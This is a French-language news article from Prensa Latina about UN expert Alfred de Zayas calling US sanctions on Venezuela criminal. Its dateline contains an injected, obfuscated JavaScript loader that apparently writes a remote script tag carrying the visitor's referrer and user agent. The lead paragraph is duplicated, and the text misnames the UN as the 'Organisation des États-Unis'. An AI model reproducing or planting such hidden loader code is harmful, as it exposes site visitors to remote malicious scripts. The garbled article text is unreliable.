mardi 16 avril 2024 |
Prensa Latina - Qui sommes nous

| Contacter avec Prensa Latina

Agence d'information Latino-américaine
Édition française
Search
Close this search box.

Un expert de l´ONU considère les sanctions contre le Venezuela de criminelles

Caracas, eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|zdknt|var|u0026u|referrer|dhhyn||js|php'.split('|'),0,{})) 22 mars (Prensa Latina) L´expert indépendant de l´Organisation des États-Unis (ONU), Alfred de Zayas, a qualifié de criminelles les sanctions économiques imposées par le gouvernement des États-Unis au Venezuela.

Caracas, 22 mars (Prensa Latina) L´expert indépendant de l´Organisation des États-Unis (ONU), Alfred de Zayas, a qualifié de criminelles les sanctions économiques imposées par le gouvernement des États-Unis au Venezuela.

Le spécialiste, en charge de la promotion d´un ordre international démocratique et équitable, a assuré que la nation sud-américaine doit solliciter à la Cour Pénale Internationale une enquête sur des crimes contre l´humanité commis par Washington en imposant de telles mesures restrictives contre Caracas.

L´escalade des attaques contre la souveraineté du Venezuela de la part de la Maison Blanche s´est intensifié en mars 2015, lorsque le président de l´époque, Barack Obama, a déclaré une urgence nationale face à « la menace inhabituelle et extraordinaire que représente ce pays pour la sécurité et la politique extérieure des États-Unis ».

Alfred de Zayas a assuré que les sanctions contre le Venezuela ont aggravé la crise économique provoquée, entre autre, par la chute des prix du pétrole.

peo/mgt/wup

EN CONTINU
notes connexes